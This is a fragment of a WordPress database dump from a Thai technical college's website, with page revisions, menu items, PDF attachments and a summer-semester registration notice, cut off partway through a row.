INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1108, 3, '2018-02-16 13:06:37', '2018-02-16 06:06:37', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1552\" height=\"650\" /></h3>\r\n<h4><img class=\"wp-image-952 alignnone\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53.jpg\" alt=\"\" width=\"1500\" height=\"962\" /><img class=\"wp-image-953 alignnone\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26-300x204.jpg\" alt=\"\" width=\"1500\" height=\"1020\" /><img class=\"wp-image-954 alignnone\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46-300x208.jpg\" alt=\"\" width=\"1500\" height=\"1040\" /></h4>\r\n<a href=\"/%E0%B8%A7%E0%B8%B4%E0%B8%AA%E0%B8%B1%E0%B8%A2%E0%B8%97%E0%B8%B1%E0%B8%A8%E0%B8%99%E0%B9%8C/\"><img class=\"alignleft wp-image-971\" src=\"/wp-content/uploads/2018/02/6-2-2561-9-32-58-1.jpg\" alt=\"\" width=\"204\" height=\"110\" /></a>\r\n\r\n<a href=\"/พันธกิจ\"><img class=\"alignleft wp-image-972\" src=\"/wp-content/uploads/2018/02/6-2-2561-9-34-49-1.jpg\" alt=\"\" width=\"197\" height=\"108\" /></a>\r\n\r\n<a href=\"/ปรัชญา/\"><img class=\"alignleft wp-image-973\" src=\"/wp-content/uploads/2018/02/6-2-2561-9-36-58-1.jpg\" alt=\"\" width=\"195\" height=\"105\" /></a>\r\n\r\n<img class=\"wp-image-974 alignleft\" src=\"/wp-content/uploads/2018/02/6-2-2561-9-38-34-1.jpg\" alt=\"\" width=\"192\" height=\"103\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-994 size-full\" src=\"/wp-content/uploads/2018/02/6-2-2561-13-13-21.jpg\" alt=\"\" width=\"824\" height=\"623\" />\r\n\r\n<img class=\"wp-image-997 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/6-2-2561-13-33-01.jpg\" alt=\"\" width=\"812\" height=\"618\" />\r\n\r\n<img class=\"aligncenter wp-image-998 size-full\" src=\"/wp-content/uploads/2018/02/6-2-2561-13-41-55.jpg\" alt=\"\" width=\"804\" height=\"616\" />\r\n\r\n \r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-02-16 13:06:37', '2018-02-16 06:06:37', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(1109, 3, '2018-02-16 13:43:10', '2018-02-16 06:43:10', '<img class=\"aligncenter wp-image-1193 size-full\" src=\"/wp-content/uploads/2018/02/19-2-2561-9-35-41.jpg\" alt=\"\" width=\"829\" height=\"617\" />\r\n\r\n<a href=\"http://www.technicrayong.ac.th/วิสัยทัศน์\"><img class=\"alignnone wp-image-1200 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<a href=\"http://www.technicrayong.ac.th/พันธกิจ\"><img class=\"alignnone wp-image-1204 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<a href=\"http://www.technicrayong.ac.th/ปรัชญา\"><img class=\"alignnone wp-image-1203 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /></a>\r\n\r\n<a href=\"http://www.technicrayong.ac.th/อัตลักษณ์\"><img class=\"alignnone wp-image-1202 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" /></a>', 'เอกลักษณ์', '', 'publish', 'closed', 'closed', '', '%e0%b9%80%e0%b8%ad%e0%b8%81%e0%b8%a5%e0%b8%b1%e0%b8%81%e0%b8%a9%e0%b8%93%e0%b9%8c', '', '', '2018-06-19 13:51:52', '2018-06-19 06:51:52', '', 0, 'http://www.technicrayong.ac.th/?page_id=1109', 0, 'page', '', 0),
(1111, 3, '2018-02-16 13:43:10', '2018-02-16 06:43:10', '<img class=\"aligncenter wp-image-1110 size-full\" src=\"/wp-content/uploads/2018/02/16-2-2561-13-41-35.jpg\" alt=\"\" width=\"696\" height=\"426\" />', 'เอกลักษณ์', '', 'inherit', 'closed', 'closed', '', '1109-revision-v1', '', '', '2018-02-16 13:43:10', '2018-02-16 06:43:10', '', 1109, 'http://www.technicrayong.ac.th/1109-revision-v1/', 0, 'revision', '', 0),
(1113, 3, '2018-02-16 13:47:16', '2018-02-16 06:47:16', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1552\" height=\"650\" /></h3>\r\n<h4><img class=\"aligncenter wp-image-952 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53.jpg\" alt=\"\" width=\"826\" height=\"530\" /><img class=\"aligncenter wp-image-953 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"819\" height=\"557\" /><img class=\"wp-image-954 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46.jpg\" alt=\"\" width=\"831\" height=\"576\" /></h4>\r\n<a href=\"/%E0%B8%A7%E0%B8%B4%E0%B8%AA%E0%B8%B1%E0%B8%A2%E0%B8%97%E0%B8%B1%E0%B8%A8%E0%B8%99%E0%B9%8C/\"><img class=\"alignleft wp-image-971\" src=\"/wp-content/uploads/2018/02/6-2-2561-9-32-58-1.jpg\" alt=\"\" width=\"204\" height=\"110\" /></a>\r\n\r\n<a href=\"/พันธกิจ\"><img class=\"alignleft wp-image-972\" src=\"/wp-content/uploads/2018/02/6-2-2561-9-34-49-1.jpg\" alt=\"\" width=\"197\" height=\"108\" /></a>\r\n\r\n<a href=\"/ปรัชญา/\"><img class=\"alignleft wp-image-973\" src=\"/wp-content/uploads/2018/02/6-2-2561-9-36-58-1.jpg\" alt=\"\" width=\"195\" height=\"105\" /></a>\r\n\r\n<a href=\"http://www.technicrayong.ac.th/เอกลักษณ์/\"><img class=\"alignleft wp-image-974\" src=\"/wp-content/uploads/2018/02/6-2-2561-9-38-34-1.jpg\" alt=\"\" width=\"192\" height=\"103\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-994 size-full\" src=\"/wp-content/uploads/2018/02/6-2-2561-13-13-21.jpg\" alt=\"\" width=\"824\" height=\"623\" />\r\n\r\n<img class=\"wp-image-997 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/6-2-2561-13-33-01.jpg\" alt=\"\" width=\"812\" height=\"618\" />\r\n\r\n<img class=\"aligncenter wp-image-998 size-full\" src=\"/wp-content/uploads/2018/02/6-2-2561-13-41-55.jpg\" alt=\"\" width=\"804\" height=\"616\" />\r\n\r\n \r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-02-16 13:47:16', '2018-02-16 06:47:16', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(1114, 3, '2018-02-16 13:49:09', '2018-02-16 06:49:09', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1552\" height=\"650\" /></h3>\r\n<h4><img class=\"wp-image-952 size-full alignleft\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53.jpg\" alt=\"\" width=\"826\" height=\"530\" /><img class=\"wp-image-953 size-full alignleft\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"819\" height=\"557\" /><img class=\"wp-image-954 size-full alignleft\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46.jpg\" alt=\"\" width=\"831\" height=\"576\" /></h4>\r\n<a href=\"/%E0%B8%A7%E0%B8%B4%E0%B8%AA%E0%B8%B1%E0%B8%A2%E0%B8%97%E0%B8%B1%E0%B8%A8%E0%B8%99%E0%B9%8C/\"><img class=\"alignleft wp-image-971\" src=\"/wp-content/uploads/2018/02/6-2-2561-9-32-58-1.jpg\" alt=\"\" width=\"204\" height=\"110\" /></a>\r\n\r\n<a href=\"/พันธกิจ\"><img class=\"alignleft wp-image-972\" src=\"/wp-content/uploads/2018/02/6-2-2561-9-34-49-1.jpg\" alt=\"\" width=\"197\" height=\"108\" /></a>\r\n\r\n<a href=\"/ปรัชญา/\"><img class=\"alignleft wp-image-973\" src=\"/wp-content/uploads/2018/02/6-2-2561-9-36-58-1.jpg\" alt=\"\" width=\"195\" height=\"105\" /></a>\r\n\r\n<a href=\"/เอกลักษณ์/\"><img class=\"alignleft wp-image-974\" src=\"/wp-content/uploads/2018/02/6-2-2561-9-38-34-1.jpg\" alt=\"\" width=\"192\" height=\"103\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-994 size-full\" src=\"/wp-content/uploads/2018/02/6-2-2561-13-13-21.jpg\" alt=\"\" width=\"824\" height=\"623\" />\r\n\r\n<img class=\"wp-image-997 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/6-2-2561-13-33-01.jpg\" alt=\"\" width=\"812\" height=\"618\" />\r\n\r\n<img class=\"aligncenter wp-image-998 size-full\" src=\"/wp-content/uploads/2018/02/6-2-2561-13-41-55.jpg\" alt=\"\" width=\"804\" height=\"616\" />\r\n\r\n \r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-02-16 13:49:09', '2018-02-16 06:49:09', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(1115, 3, '2018-02-16 14:55:42', '2018-02-16 07:55:42', '', 'อุตสาหกรรม', '', 'publish', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%b8%e0%b8%95%e0%b8%aa%e0%b8%b2%e0%b8%ab%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1', '', '', '2022-04-29 12:30:34', '2022-04-29 05:30:34', '', 0, 'http://www.technicrayong.ac.th/?p=1115', 60, 'nav_menu_item', '', 0),
(1116, 3, '2018-02-16 14:55:43', '2018-02-16 07:55:43', '', 'พาณิชยกรรม/บริหารธุรกิจ', '', 'publish', 'closed', 'closed', '', '%e0%b8%9e%e0%b8%b2%e0%b8%93%e0%b8%b4%e0%b8%8a%e0%b8%a2%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1', '', '', '2022-04-29 12:30:34', '2022-04-29 05:30:34', '', 0, 'http://www.technicrayong.ac.th/?p=1116', 73, 'nav_menu_item', '', 0),
(1118, 3, '2018-02-16 14:55:43', '2018-02-16 07:55:43', '', 'คหกรรมศาสตร์', '', 'publish', 'closed', 'closed', '', '%e0%b8%84%e0%b8%ab%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b9%8c-2', '', '', '2022-04-29 12:30:35', '2022-04-29 05:30:35', '', 0, 'http://www.technicrayong.ac.th/?p=1118', 79, 'nav_menu_item', '', 0),
(1119, 3, '2018-02-16 14:55:44', '2018-02-16 07:55:44', '', 'อุตสาหกรรมท่องเที่ยว', '', 'publish', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%b8%e0%b8%95%e0%b8%aa%e0%b8%b2%e0%b8%ab%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b8%97%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%97%e0%b8%b5%e0%b9%88%e0%b8%a2%e0%b8%a7', '', '', '2022-04-29 12:30:35', '2022-04-29 05:30:35', '', 0, 'http://www.technicrayong.ac.th/?p=1119', 82, 'nav_menu_item', '', 0),
(1121, 3, '2018-02-16 14:55:42', '2018-02-16 07:55:42', '', 'เครื่องมือวัดและควบคุม', '', 'publish', 'closed', 'closed', '', '%e0%b9%80%e0%b8%84%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a1%e0%b8%b7%e0%b8%ad%e0%b8%a7%e0%b8%b1%e0%b8%94%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b8%84%e0%b8%a7%e0%b8%9a%e0%b8%84%e0%b8%b8%e0%b8%a1', '', '', '2022-04-29 12:30:34', '2022-04-29 05:30:34', '', 0, 'http://www.technicrayong.ac.th/?p=1121', 71, 'nav_menu_item', '', 0),
(1122, 3, '2018-02-16 14:55:42', '2018-02-16 07:55:42', '', 'ปิโตรเคมี', '', 'publish', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%b4%e0%b9%82%e0%b8%95%e0%b8%a3%e0%b9%80%e0%b8%84%e0%b8%a1%e0%b8%b5', '', '', '2022-04-29 12:30:34', '2022-04-29 05:30:34', '', 0, 'http://www.technicrayong.ac.th/?p=1122', 68, 'nav_menu_item', '', 0),
(1123, 3, '2018-02-16 14:55:43', '2018-02-16 07:55:43', '', 'เคมีอุตสาหกรรม', '', 'publish', 'closed', 'closed', '', '%e0%b9%80%e0%b8%84%e0%b8%a1%e0%b8%b5%e0%b8%ad%e0%b8%b8%e0%b8%95%e0%b8%aa%e0%b8%b2%e0%b8%ab%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1', '', '', '2022-04-29 12:30:34', '2022-04-29 05:30:34', '', 0, 'http://www.technicrayong.ac.th/?p=1123', 69, 'nav_menu_item', '', 0),
(1124, 3, '2018-02-16 14:55:43', '2018-02-16 07:55:43', '', 'เทคโนโลยียาง', '', 'publish', 'closed', 'closed', '', '%e0%b9%80%e0%b8%97%e0%b8%84%e0%b9%82%e0%b8%99%e0%b9%82%e0%b8%a5%e0%b8%a2%e0%b8%b5%e0%b8%a2%e0%b8%b2%e0%b8%87', '', '', '2022-04-29 12:30:34', '2022-04-29 05:30:34', '', 0, 'http://www.technicrayong.ac.th/?p=1124', 70, 'nav_menu_item', '', 0),
(1128, 3, '2018-02-16 14:55:44', '2018-02-16 07:55:44', '', 'เทคโนโลยีสารสนเทศและการสือสาร', '', 'publish', 'closed', 'closed', '', '%e0%b9%80%e0%b8%97%e0%b8%84%e0%b9%82%e0%b8%99%e0%b9%82%e0%b8%a5%e0%b8%a2%e0%b8%b5%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%99%e0%b9%80%e0%b8%97%e0%b8%a8%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b8%81%e0%b8%b2', '', '', '2022-04-29 12:30:35', '2022-04-29 05:30:35', '', 0, 'http://www.technicrayong.ac.th/?p=1128', 85, 'nav_menu_item', '', 0),
(1129, 3, '2018-02-16 14:55:44', '2018-02-16 07:55:44', '', 'เทคโนโลยีสารสนเทศ', '', 'publish', 'closed', 'closed', '', '%e0%b9%80%e0%b8%97%e0%b8%84%e0%b9%82%e0%b8%99%e0%b9%82%e0%b8%a5%e0%b8%a2%e0%b8%b5%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%99%e0%b9%80%e0%b8%97%e0%b8%a8-2', '', '', '2022-04-29 12:30:35', '2022-04-29 05:30:35', '', 0, 'http://www.technicrayong.ac.th/?p=1129', 86, 'nav_menu_item', '', 0),
(1130, 4, '2018-02-16 14:54:24', '2018-02-16 07:54:24', '', 'ประกาศการเปิดภาคฤดูร้อน2560', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%80%e0%b8%9b%e0%b8%b4%e0%b8%94%e0%b8%a0%e0%b8%b2%e0%b8%84%e0%b8%a4%e0%b8%94%e0%b8%b9%e0%b8%a3%e0%b9%89%e0%b8%ad', '', '', '2018-02-16 14:54:24', '2018-02-16 07:54:24', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/ประกาศการเปิดภาคฤดูร้อน2560.pdf', 0, 'attachment', 'application/pdf', 0),
(1131, 4, '2018-02-16 14:57:13', '2018-02-16 07:57:13', '', 'แก้ไขประกาศการเปิดภาคฤดูร้อน', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%81%e0%b9%89%e0%b9%84%e0%b8%82%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%80%e0%b8%9b%e0%b8%b4%e0%b8%94%e0%b8%a0%e0%b8%b2%e0%b8%84%e0%b8%a4', '', '', '2018-02-16 14:57:13', '2018-02-16 07:57:13', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/แก้ไขประกาศการเปิดภาคฤดูร้อน.pdf', 0, 'attachment', 'application/pdf', 0),
(1134, 3, '2018-02-16 15:11:55', '2018-02-16 08:11:55', '', 'งานบริหารงานทั่วไป', '', 'publish', 'closed', 'closed', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%ab%e0%b8%b2%e0%b8%a3%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%97%e0%b8%b1%e0%b9%88%e0%b8%a7%e0%b9%84%e0%b8%9b', '', '', '2022-04-29 12:30:32', '2022-04-29 05:30:32', '', 0, 'http://www.technicrayong.ac.th/?p=1134', 26, 'nav_menu_item', '', 0),
(1135, 3, '2018-02-16 15:11:55', '2018-02-16 08:11:55', '', 'งานการเงิน', '', 'publish', 'closed', 'closed', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%80%e0%b8%87%e0%b8%b4%e0%b8%99', '', '', '2022-04-29 12:30:32', '2022-04-29 05:30:32', '', 0, 'http://www.technicrayong.ac.th/?p=1135', 28, 'nav_menu_item', '', 0),
(1136, 3, '2018-02-16 15:11:55', '2018-02-16 08:11:55', '', 'งานการบัญชี', '', 'publish', 'closed', 'closed', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9a%e0%b8%b1%e0%b8%8d%e0%b8%8a%e0%b8%b5', '', '', '2022-04-29 12:30:32', '2022-04-29 05:30:32', '', 0, 'http://www.technicrayong.ac.th/?p=1136', 29, 'nav_menu_item', '', 0),
(1137, 3, '2018-02-16 15:11:55', '2018-02-16 08:11:55', '', 'งานพัสดุ', '', 'publish', 'closed', 'closed', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9e%e0%b8%b1%e0%b8%aa%e0%b8%94%e0%b8%b8', '', '', '2022-04-29 12:30:32', '2022-04-29 05:30:32', '', 0, 'http://www.technicrayong.ac.th/?p=1137', 30, 'nav_menu_item', '', 0),
(1138, 3, '2018-02-16 15:11:55', '2018-02-16 08:11:55', '', 'งานอาคารสถานที่', '', 'publish', 'closed', 'closed', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%ad%e0%b8%b2%e0%b8%84%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%96%e0%b8%b2%e0%b8%99%e0%b8%97%e0%b8%b5%e0%b9%88', '', '', '2022-04-29 12:30:32', '2022-04-29 05:30:32', '', 0, 'http://www.technicrayong.ac.th/?p=1138', 31, 'nav_menu_item', '', 0),
(1140, 3, '2018-02-16 15:11:55', '2018-02-16 08:11:55', '', 'งานทะเบียน', '', 'publish', 'closed', 'closed', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%97%e0%b8%b0%e0%b9%80%e0%b8%9a%e0%b8%b5%e0%b8%a2%e0%b8%99', '', '', '2022-04-29 12:30:32', '2022-04-29 05:30:32', '', 0, 'http://www.technicrayong.ac.th/?p=1140', 32, 'nav_menu_item', '', 0),
(1141, 3, '2018-02-16 15:11:55', '2018-02-16 08:11:55', '', 'งานประชาสัมพันธ์', '', 'publish', 'closed', 'closed', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c', '', '', '2022-04-29 12:30:32', '2022-04-29 05:30:32', '', 0, 'http://www.technicrayong.ac.th/?p=1141', 33, 'nav_menu_item', '', 0),
(1143, 3, '2018-02-16 15:18:38', '2018-02-16 08:18:38', '', 'งานวางแผนและงบประมาณ', '', 'publish', 'closed', 'closed', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%a7%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b8%87%e0%b8%9a%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%a1%e0%b8%b2%e0%b8%93', '', '', '2022-04-29 12:30:33', '2022-04-29 05:30:33', '', 0, 'http://www.technicrayong.ac.th/?p=1143', 37, 'nav_menu_item', '', 0),
(1144, 3, '2018-02-16 15:18:38', '2018-02-16 08:18:38', '', 'งานศูนย์ข้อมูลสารสนเทศ', '', 'publish', 'closed', 'closed', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%a8%e0%b8%b9%e0%b8%99%e0%b8%a2%e0%b9%8c%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%99%e0%b9%80%e0%b8%97%e0%b8%a8', '', '', '2022-04-29 12:30:33', '2022-04-29 05:30:33', '', 0, 'http://www.technicrayong.ac.th/?p=1144', 38, 'nav_menu_item', '', 0),
(1146, 3, '2018-02-16 15:18:38', '2018-02-16 08:18:38', '', 'งานความร่วมมือ', '', 'publish', 'closed', 'closed', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%a3%e0%b9%88%e0%b8%a7%e0%b8%a1%e0%b8%a1%e0%b8%b7%e0%b8%ad', '', '', '2022-04-29 12:30:33', '2022-04-29 05:30:33', '', 0, 'http://www.technicrayong.ac.th/?p=1146', 39, 'nav_menu_item', '', 0),
(1147, 3, '2018-02-16 15:18:38', '2018-02-16 08:18:38', '', 'งานวิจัย พัฒนา นวัตกรรม และสิ่งประดิษฐ์', '', 'publish', 'closed', 'closed', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%a7%e0%b8%b4%e0%b8%88%e0%b8%b1%e0%b8%a2-%e0%b8%9e%e0%b8%b1%e0%b8%92%e0%b8%99%e0%b8%b2-%e0%b8%99%e0%b8%a7%e0%b8%b1%e0%b8%95%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1', '', '', '2022-04-29 12:30:33', '2022-04-29 05:30:33', '', 0, 'http://www.technicrayong.ac.th/?p=1147', 40, 'nav_menu_item', '', 0),
(1148, 3, '2018-02-16 15:18:38', '2018-02-16 08:18:38', '', 'งานประกันคุณภาพและมาตรฐานการศึกษา', '', 'publish', 'closed', 'closed', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b1%e0%b8%99%e0%b8%84%e0%b8%b8%e0%b8%93%e0%b8%a0%e0%b8%b2%e0%b8%9e%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b8%a1%e0%b8%b2%e0%b8%95%e0%b8%a3', '', '', '2022-04-29 12:30:33', '2022-04-29 05:30:33', '', 0, 'http://www.technicrayong.ac.th/?p=1148', 41, 'nav_menu_item', '', 0),
(1149, 3, '2018-02-16 15:18:38', '2018-02-16 08:18:38', '', 'งานส่งเสริมผลิตผล การค้าและประกอบธุรกิจ', '', 'publish', 'closed', 'closed', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%aa%e0%b9%88%e0%b8%87%e0%b9%80%e0%b8%aa%e0%b8%a3%e0%b8%b4%e0%b8%a1%e0%b8%9c%e0%b8%a5%e0%b8%b4%e0%b8%95%e0%b8%9c%e0%b8%a5-%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%84%e0%b9%89', '', '', '2022-04-29 12:30:33', '2022-04-29 05:30:33', '', 0, 'http://www.technicrayong.ac.th/?p=1149', 42, 'nav_menu_item', '', 0),
(1150, 3, '2018-02-16 15:20:16', '2018-02-16 08:20:16', '<span style=\"color: #0000ff;\">ขอรับคำร้องและยื่นคำร้องขอเปิดรายวิชาที่งานพัฒนาหลักสูตรฯ (ห้อง127) อาคารอำนวยการ</span>\r\n\r\n<span style=\"color: #339966;\"> - รอบที่ 2 วันที่ 7-8 มีนาคม 2561 </span>\r\n\r\n<span style=\"color: #0000ff;\">ประกาศรายชื่อรายวิชาที่เปิดสอน รอบ 2 วันที่ 9 มีนาคม 2561</span>\r\n\r\n<span style=\"color: #0000ff;\">กำหนดการลงทะเบียน </span>\r\n\r\n<span style=\"color: #339966;\">- รอบที่ 1 สำหรับรายวิชาที่ประกาศแล้วรอบที่ 1 วันที่ 5-6 มีนาคม 2561 </span>\r\n\r\n<span style=\"color: #339966;\"> - รอบที 2 สำหรับรายวิชาที่ประกาศเพิ่มเติมรอบที่ 2 วันที่ 12-13 มีนาคม 2561</span>\r\n\r\n<span style=\"color: #0000ff;\">ระยะเวลาเรียน ตั้งแต่วันที่ 12 มีนาคม ถึงวันที่ 5 เมษายน 2561</span>\r\n\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%9B%E0%B8%B4%E0%B8%94%E0%B8%A0%E0%B8%B2%E0%B8%84%E0%B8%A4%E0%B8%94%E0%B8%B9%E0%B8%A3%E0%B9%89%E0%B8%AD%E0%B8%992560.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n\r\nแก้ไขประกาศ\r\n\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%81%E0%B9%89%E0%B9%84%E0%B8%82%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%9B%E0%B8%B4%E0%B8%94%E0%B8%A0%E0%B8%B2%E0%B8%84%E0%B8%A4%E0%B8%94%E0%B8%B9%E0%B8%A3%E0%B9%89%E0%B8%AD%E0%B8%99.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n\r\n ', 'ประกาศการเปิดเรียนภาคฤดูร้อนปีการศึกษา 2560', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%80%e0%b8%9b%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%a0%e0%b8%b2%e0%b8%84%e0%b8%a4', '', '', '2018-02-16 15:21:11', '2018-02-16 08:21:11', '', 0, 'http://www.technicrayong.ac.th/?p=1150', 464, 'post', '', 0),
(1151, 3, '2018-02-16 15:20:16', '2018-02-16 08:20:16', '', 'ประกาศการเปิดเรียนภาคฤดูร้อนปีการศึกษา 2560', '', 'inherit', 'closed', 'closed', '', '1150-revision-v1', '', '', '2018-02-16 15:20:16', '2018-02-16 08:20:16', '', 1150, 'http://www.technicrayong.ac.th/1150-revision-v1/', 0, 'revision', '', 0),
(1152, 3, '2018-02-16 15:21:11', '2018-02-16 08:21:11', '<span style=\"color: #0000ff;\">ขอรับคำร้องและยื่นคำร้องขอเปิดรายวิชาที่งานพัฒนาหลักสูตรฯ (ห้อง127) อาคารอำนวยการ</span>\r\n\r\n<span style=\"color: #339966;\"> - รอบที่ 2 วันที่ 7-8 มีนาคม 2561 </span>\r\n\r\n<span style=\"color: #0000ff;\">ประกาศรายชื่อรายวิชาที่เปิดสอน รอบ 2 วันที่ 9 มีนาคม 2561</span>\r\n\r\n<span style=\"color: #0000ff;\">กำหนดการลงทะเบียน </span>\r\n\r\n<span style=\"color: #339966;\">- รอบที่ 1 สำหรับรายวิชาที่ประกาศแล้วรอบที่ 1 วันที่ 5-6 มีนาคม 2561 </span>\r\n\r\n<span style=\"color: #339966;\"> - รอบที 2 สำหรับรายวิชาที่ประกาศเพิ่มเติมรอบที่ 2 วันที่ 12-13 มีนาคม 2561</span>\r\n\r\n<span style=\"color: #0000ff;\">ระยะเวลาเรียน ตั้งแต่วันที่ 12 มีนาคม ถึงวันที่ 5 เมษายน 2561</span>\r\n\r\n[pdfjs-viewer 